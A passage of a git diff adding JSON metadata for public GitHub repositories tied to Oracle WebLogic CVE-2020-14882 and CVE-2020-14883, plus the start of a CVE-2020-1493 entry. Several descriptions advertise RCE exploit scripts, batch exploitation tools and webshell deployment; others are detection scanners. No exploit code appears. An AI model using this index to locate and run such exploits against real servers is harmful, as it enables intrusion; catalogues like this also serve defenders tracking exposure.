"web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 308343789, + "name": "cve-2020-14882", + "full_name": "0thm4n3\/cve-2020-14882", + "owner": { + "login": "0thm4n3", + "id": 12746014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12746014?v=4", + "html_url": "https:\/\/github.com\/0thm4n3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0thm4n3\/cve-2020-14882", + "description": "Bash script to exploit the Oracle's Weblogic Unauthenticated Remote Command Execution - CVE-2020-14882", + "fork": false, + "created_at": "2020-10-29T13:53:31Z", + "updated_at": "2021-03-18T23:46:12Z", + "pushed_at": "2020-10-31T13:03:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 308374913, + "name": "cve-2020-14882", + "full_name": "wsfengfan\/cve-2020-14882", + "owner": { + "login": "wsfengfan", + "id": 33821840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33821840?v=4", + "html_url": "https:\/\/github.com\/wsfengfan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wsfengfan\/cve-2020-14882", + "description": "CVE-2020-14882 EXP 回显", + "fork": false, + "created_at": "2020-10-29T15:44:23Z", + "updated_at": "2024-08-12T20:07:12Z", + "pushed_at": "2020-11-09T09:55:10Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 308605927, + "name": "CVE-2020-14882", + "full_name": "alexfrancow\/CVE-2020-14882", + "owner": { + "login": "alexfrancow", + "id": 23419929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23419929?v=4", + "html_url": "https:\/\/github.com\/alexfrancow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alexfrancow\/CVE-2020-14882", + "description": null, + "fork": false, + "created_at": "2020-10-30T11:07:11Z", + "updated_at": "2023-01-10T03:22:09Z", + "pushed_at": "2020-10-31T15:57:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 308782228, + "name": "CVE-2020-14882_POC", + "full_name": "GGyao\/CVE-2020-14882_POC", + "owner": { + "login": "GGyao", + "id": 38530938, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38530938?v=4", + "html_url": "https:\/\/github.com\/GGyao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GGyao\/CVE-2020-14882_POC", + "description": "CVE-2020-14882批量验证工具。", + "fork": false, + "created_at": "2020-10-31T01:43:54Z", + "updated_at": "2022-09-05T15:26:08Z", + "pushed_at": "2020-12-01T05:05:24Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 309098912, + "name": "Weblogic_Unauthorized-bypass-RCE", + "full_name": "ludy-dev\/Weblogic_Unauthorized-bypass-RCE", + "owner": { + "login": "ludy-dev", + "id": 70466565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70466565?v=4", + "html_url": "https:\/\/github.com\/ludy-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ludy-dev\/Weblogic_Unauthorized-bypass-RCE", + "description": "(CVE-2020-14882) Oracle Weblogic Unauthorized bypass RCE test script", + "fork": false, + "created_at": "2020-11-01T13:12:27Z", + "updated_at": "2024-08-28T23:48:19Z", + "pushed_at": "2020-11-01T13:56:48Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 309655403, + "name": "CVE-2020-14882_ALL", + "full_name": "GGyao\/CVE-2020-14882_ALL", + "owner": { + "login": "GGyao", + "id": 38530938, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38530938?v=4", + "html_url": "https:\/\/github.com\/GGyao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GGyao\/CVE-2020-14882_ALL", + "description": "CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。", + "fork": false, + "created_at": "2020-11-03T10:49:35Z", + "updated_at": "2024-11-26T08:32:27Z", + "pushed_at": "2022-03-29T02:08:45Z", + "stargazers_count": 145, + "watchers_count": 145, + "has_discussions": false, + "forks_count": 39, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 39, + "watchers": 145, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 309666360, + "name": "CVE-2020-14882-checker", + "full_name": "ovProphet\/CVE-2020-14882-checker", + "owner": { + "login": "ovProphet", + "id": 12277617, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12277617?v=4", + "html_url": "https:\/\/github.com\/ovProphet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ovProphet\/CVE-2020-14882-checker", + "description": "CVE-2020-14882 detection script", + "fork": false, + "created_at": "2020-11-03T11:34:38Z", + "updated_at": "2021-03-18T23:48:22Z", + "pushed_at": "2020-11-03T11:34:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 309868259, + "name": "CVE-2020-14882", + "full_name": "NS-Sp4ce\/CVE-2020-14882", + "owner": { + "login": "NS-Sp4ce", + "id": 33349032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33349032?v=4", + "html_url": "https:\/\/github.com\/NS-Sp4ce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NS-Sp4ce\/CVE-2020-14882", + "description": "CVE-2020-14882\/14883\/14750", + "fork": false, + "created_at": "2020-11-04T03:09:13Z", + "updated_at": "2023-09-25T16:37:26Z", + "pushed_at": "2020-11-04T03:15:33Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 20, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 310303375, + "name": "cve-2020-14882", + "full_name": "mmioimm\/cve-2020-14882", + "owner": { + "login": "mmioimm", + "id": 19258899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19258899?v=4", + "html_url": "https:\/\/github.com\/mmioimm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mmioimm\/cve-2020-14882", + "description": null, + "fork": false, + "created_at": "2020-11-05T13:12:28Z", + "updated_at": "2021-07-01T07:17:20Z", + "pushed_at": "2020-11-05T13:14:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 311265070, + "name": "CVE-2020-14882", + "full_name": "QmF0c3UK\/CVE-2020-14882", + "owner": { + "login": "QmF0c3UK", + "id": 29447678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29447678?v=4", + "html_url": "https:\/\/github.com\/QmF0c3UK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/QmF0c3UK\/CVE-2020-14882", + "description": null, + "fork": false, + "created_at": "2020-11-09T08:03:44Z", + "updated_at": "2024-08-12T20:07:29Z", + "pushed_at": "2020-11-12T06:23:23Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 311340226, + "name": "CVE-2020-14882", + "full_name": "murataydemir\/CVE-2020-14882", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2020-14882", + "description": "[CVE-2020-14882] Oracle WebLogic Server Authentication Bypass", + "fork": false, + "created_at": "2020-11-09T13:02:43Z", + "updated_at": "2024-08-12T20:07:30Z", + "pushed_at": "2020-11-09T16:35:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 311887487, + "name": "CVE-2020-14882-GUI-Test", + "full_name": "Ormicron\/CVE-2020-14882-GUI-Test", + "owner": { + "login": "Ormicron", + "id": 26640179, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26640179?v=4", + "html_url": "https:\/\/github.com\/Ormicron", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ormicron\/CVE-2020-14882-GUI-Test", + "description": "基于qt的图形化CVE-2020-14882漏洞回显测试工具.", + "fork": false, + "created_at": "2020-11-11T06:52:32Z", + "updated_at": "2022-05-13T22:02:55Z", + "pushed_at": "2020-11-11T07:19:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 312193698, + "name": "CVE-2020-14882-weblogicRCE", + "full_name": "corelight\/CVE-2020-14882-weblogicRCE", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2020-14882-weblogicRCE", + "description": "Detection of RCE in Oracle's WebLogic Server CVE-2020-14882 \/ CVE-2020-14750", + "fork": false, + "created_at": "2020-11-12T06:59:54Z", + "updated_at": "2024-08-12T20:07:35Z", + "pushed_at": "2020-12-02T21:43:52Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 6, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 312256179, + "name": "CVE-2020-14882", + "full_name": "xfiftyone\/CVE-2020-14882", + "owner": { + "login": "xfiftyone", + "id": 45651912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45651912?v=4", + "html_url": "https:\/\/github.com\/xfiftyone", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xfiftyone\/CVE-2020-14882", + "description": null, + "fork": false, + "created_at": "2020-11-12T11:27:39Z", + "updated_at": "2023-09-17T10:24:22Z", + "pushed_at": "2020-11-13T03:35:44Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 313643357, + "name": "CVE-2020-14882", + "full_name": "BabyTeam1024\/CVE-2020-14882", + "owner": { + "login": "BabyTeam1024", + "id": 74447452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74447452?v=4", + "html_url": "https:\/\/github.com\/BabyTeam1024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BabyTeam1024\/CVE-2020-14882", + "description": null, + "fork": false, + "created_at": "2020-11-17T14:23:23Z", + "updated_at": "2020-11-17T14:23:23Z", + "pushed_at": "2020-11-17T14:23:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 325429279, + "name": "CodeTest", + "full_name": "adm1in\/CodeTest", + "owner": { + "login": "adm1in", + "id": 37677854, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37677854?v=4", + "html_url": "https:\/\/github.com\/adm1in", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adm1in\/CodeTest", + "description": "CodeTest信息收集和漏洞利用工具,可在进行渗透测试之时方便利用相关信息收集脚本进行信息的获取和验证工作,漏洞利用模块可选择需要测试的漏洞模块,或者选择所有模块测试,包含CVE-2020-14882, CVE-2020-2555等,可自己收集脚本后按照模板进行修改。", + "fork": false, + "created_at": "2020-12-30T01:55:52Z", + "updated_at": "2024-11-09T02:38:55Z", + "pushed_at": "2020-12-29T10:47:39Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 334149882, + "name": "CVE-2020-14882-WebLogic", + "full_name": "pwn3z\/CVE-2020-14882-WebLogic", + "owner": { + "login": "pwn3z", + "id": 71440287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71440287?v=4", + "html_url": "https:\/\/github.com\/pwn3z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwn3z\/CVE-2020-14882-WebLogic", + "description": null, + "fork": false, + "created_at": "2021-01-29T13:12:40Z", + "updated_at": "2024-08-12T20:09:52Z", + "pushed_at": "2021-01-29T13:13:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 342244938, + "name": "CVE-2020-14882", + "full_name": "milo2012\/CVE-2020-14882", + "owner": { + "login": "milo2012", + "id": 905335, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/905335?v=4", + "html_url": "https:\/\/github.com\/milo2012", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/milo2012\/CVE-2020-14882", + "description": "CVE-2020-14882", + "fork": false, + "created_at": "2021-02-25T12:57:08Z", + "updated_at": "2024-08-12T20:10:40Z", + "pushed_at": "2021-03-01T16:34:10Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 8, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 353271458, + "name": "CVE-2020-14882", + "full_name": "kk98kk0\/CVE-2020-14882", + "owner": { + "login": "kk98kk0", + "id": 16933557, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16933557?v=4", + "html_url": "https:\/\/github.com\/kk98kk0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kk98kk0\/CVE-2020-14882", + "description": "CVE-2020-14882部署冰蝎内存马", + "fork": false, + "created_at": "2021-03-31T07:49:06Z", + "updated_at": "2023-07-07T13:50:47Z", + "pushed_at": "2021-01-27T06:31:26Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 366180883, + "name": "CVE-2020-14882-WebLogic", + "full_name": "exploitblizzard\/CVE-2020-14882-WebLogic", + "owner": { + "login": "exploitblizzard", + "id": 61627070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61627070?v=4", + "html_url": "https:\/\/github.com\/exploitblizzard", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitblizzard\/CVE-2020-14882-WebLogic", + "description": "Check YouTube - https:\/\/youtu.be\/O0ZnLXRY5Wo", + "fork": false, + "created_at": "2021-05-10T21:32:36Z", + "updated_at": "2024-08-12T20:12:52Z", + "pushed_at": "2021-09-16T07:25:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 370628822, + "name": "CVE-2020-14882_Exploit_Gui", + "full_name": "qianniaoge\/CVE-2020-14882_Exploit_Gui", + "owner": { + "login": "qianniaoge", + "id": 38694672, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38694672?v=4", + "html_url": "https:\/\/github.com\/qianniaoge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qianniaoge\/CVE-2020-14882_Exploit_Gui", + "description": null, + "fork": false, + "created_at": "2021-05-25T08:59:45Z", + "updated_at": "2021-05-25T08:59:46Z", + "pushed_at": "2021-05-08T09:41:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 382503531, + "name": "CVE-2020-14882-14883", + "full_name": "N0Coriander\/CVE-2020-14882-14883", + "owner": { + "login": "N0Coriander", + "id": 53027649, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53027649?v=4", + "html_url": "https:\/\/github.com\/N0Coriander", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/N0Coriander\/CVE-2020-14882-14883", + "description": "结合14882的未授权访问漏洞,通过14883可远程执行任意代码", + "fork": false, + "created_at": "2021-07-03T02:02:42Z", + "updated_at": "2022-12-05T05:44:58Z", + "pushed_at": "2021-07-03T02:29:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 626325185, + "name": "CVE-2020-14882", + "full_name": "nik0nz7\/CVE-2020-14882", + "owner": { + "login": "nik0nz7", + "id": 130441760, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130441760?v=4", + "html_url": "https:\/\/github.com\/nik0nz7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nik0nz7\/CVE-2020-14882", + "description": null, + "fork": false, + "created_at": "2023-04-11T08:38:47Z", + "updated_at": "2023-04-11T08:39:22Z", + "pushed_at": "2023-04-11T08:39:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 667306503, + "name": "CVE-2020-14882", + "full_name": "Danny-LLi\/CVE-2020-14882", + "owner": { + "login": "Danny-LLi", + "id": 107776928, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107776928?v=4", + "html_url": "https:\/\/github.com\/Danny-LLi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Danny-LLi\/CVE-2020-14882", + "description": "This script allows for remote code execution (RCE) on Oracle WebLogic Server", + "fork": false, + "created_at": "2023-07-17T07:59:01Z", + "updated_at": "2024-08-13T14:39:47Z", + "pushed_at": "2023-07-17T08:06:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 716410478, + "name": "CVE-2020-14882", + "full_name": "LucasPDiniz\/CVE-2020-14882", + "owner": { + "login": "LucasPDiniz", + "id": 57265360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57265360?v=4", + "html_url": "https:\/\/github.com\/LucasPDiniz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucasPDiniz\/CVE-2020-14882", + "description": "Takeover of Oracle WebLogic Server", + "fork": false, + "created_at": "2023-11-09T04:31:26Z", + "updated_at": "2024-06-30T21:59:53Z", + "pushed_at": "2024-06-30T21:59:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2020-14882", + "oracle", + "vulnerability", + "weblogic" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 752587807, + "name": "CVE-2020-14882", + "full_name": "xMr110\/CVE-2020-14882", + "owner": { + "login": "xMr110", + "id": 42313754, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42313754?v=4", + "html_url": "https:\/\/github.com\/xMr110", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xMr110\/CVE-2020-14882", + "description": null, + "fork": false, + "created_at": "2024-02-04T09:36:09Z", + "updated_at": "2024-02-04T09:36:57Z", + "pushed_at": "2024-02-04T11:28:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-14883.json b/2020/CVE-2020-14883.json new file mode 100644 index 0000000000..5fb97f6a2a --- /dev/null +++ b/2020/CVE-2020-14883.json @@ -0,0 +1,192 @@ +[ + { + "id": 311381314, + "name": "CVE-2020-14883", + "full_name": "murataydemir\/CVE-2020-14883", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2020-14883", + "description": "[CVE-2020-14882] Oracle WebLogic Server Authenticated Remote Code Execution (RCE)", + "fork": false, + "created_at": "2020-11-09T15:26:28Z", + "updated_at": "2024-08-12T20:07:30Z", + "pushed_at": "2020-11-09T17:21:45Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 311913657, + "name": "CVE-2020-14883", + "full_name": "B1anda0\/CVE-2020-14883", + "owner": { + "login": "B1anda0", + "id": 74232513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74232513?v=4", + "html_url": "https:\/\/github.com\/B1anda0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/B1anda0\/CVE-2020-14883", + "description": "Weblogic 身份认证绕过漏洞批量检测脚本", + "fork": false, + "created_at": "2020-11-11T08:52:28Z", + "updated_at": "2024-01-12T15:11:55Z", + "pushed_at": "2020-11-11T09:12:20Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 332793501, + "name": "CVE-2020-14883EXP", + "full_name": "fan1029\/CVE-2020-14883EXP", + "owner": { + "login": "fan1029", + "id": 42530461, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42530461?v=4", + "html_url": "https:\/\/github.com\/fan1029", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fan1029\/CVE-2020-14883EXP", + "description": "用于对WebLogic(10.3.6.0.0 ;12.1.3.0.0 ;12.2.1.3.0; 12.2.1.4.0 ;14.1.1.0.0)进行验证及利用", + "fork": false, + "created_at": "2021-01-25T15:33:04Z", + "updated_at": "2021-06-22T03:20:32Z", + "pushed_at": "2021-01-26T14:26:17Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 342220518, + "name": "westone-CVE-2020-14883-scanner", + "full_name": "Osyanina\/westone-CVE-2020-14883-scanner", + "owner": { + "login": "Osyanina", + "id": 78467376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4", + "html_url": "https:\/\/github.com\/Osyanina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2020-14883-scanner", + "description": "A vulnerability scanner that detects CVE-2020-14883 vulnerabilities.", + "fork": false, + "created_at": "2021-02-25T11:21:56Z", + "updated_at": "2021-03-20T07:57:04Z", + "pushed_at": "2021-03-20T07:57:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 346861222, + "name": "PocList", + "full_name": "1n7erface\/PocList", + "owner": { + "login": "1n7erface", + "id": 52184829, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52184829?v=4", + "html_url": "https:\/\/github.com\/1n7erface", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1n7erface\/PocList", + "description": "Alibaba-Nacos-Unauthorized\/ApacheDruid-RCE_CVE-2021-25646\/MS-Exchange-SSRF-CVE-2021-26885\/Oracle-WebLogic-CVE-2021-2109_RCE\/RG-CNVD-2021-14536\/RJ-SSL-VPN-UltraVires\/Redis-Unauthorized-RCE\/TDOA-V11.7-GetOnlineCookie\/VMware-vCenter-GetAnyFile\/yongyou-GRP-U8-XXE\/Oracle-WebLogic-CVE-2020-14883\/Oracle-WebLogic-CVE-2020-14882\/Apache-Solr-GetAnyFile\/F5-BIG-IP-CVE-2021-22986\/Sonicwall-SSL-VPN-RCE\/GitLab-Graphql-CNVD-2021-14193\/D-Link-DCS-CVE-2020-25078\/WLAN-AP-WEA453e-RCE\/360TianQing-Unauthorized\/360TianQing-SQLinjection\/FanWeiOA-V8-SQLinjection\/QiZhiBaoLeiJi-AnyUserLogin\/QiAnXin-WangKangFirewall-RCE\/金山-V8-终端安全系统\/NCCloud-SQLinjection\/ShowDoc-RCE", + "fork": false, + "created_at": "2021-03-11T22:49:17Z", + "updated_at": "2024-11-27T17:40:14Z", + "pushed_at": "2023-05-11T14:36:58Z", + "stargazers_count": 1079, + "watchers_count": 1079, + "has_discussions": false, + "forks_count": 319, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "alibaba-nacos", + "jar", + "poc" + ], + "visibility": "public", + "forks": 319, + "watchers": 1079, + "score": 0, + "subscribers_count": 36 + }, + { + "id": 811762680, + "name": "CVE-2020-14883", + "full_name": "amacloudobia\/CVE-2020-14883", + "owner": { + "login": "amacloudobia", + "id": 89747766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89747766?v=4", + "html_url": "https:\/\/github.com\/amacloudobia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amacloudobia\/CVE-2020-14883", + "description": "oracle weblogic", + "fork": false, + "created_at": "2024-06-07T08:50:53Z", + "updated_at": "2024-06-07T08:53:04Z", + "pushed_at": "2024-06-07T08:53:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1493.json b/2020/CVE-2020-1493.json new file mode 100644 index 0000000000..f20e9b6d6b --- /dev/null +++ b/2020/CVE-2020-1493.json @@ -0,0 +1,33 @@ +[ + { + "id": 290121561, + "name": "CVE-2020-1493", + "full_name": "0neb1n\/CVE-2020-1493", + "owner": { + "login": "0neb1n", + "id": 22587350, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22587350?v=4", + "html_url": "https:\/\/github.com\/0neb1n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0neb1n\/CVE-2020-1493", + "description": null, + "fork": false, + "created_at": "2020-08-25T05:25:45Z", + "updated_at": "2024-08-12T20:05:06Z", + "pushed_at": "2020-08-25T05:46:30Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + 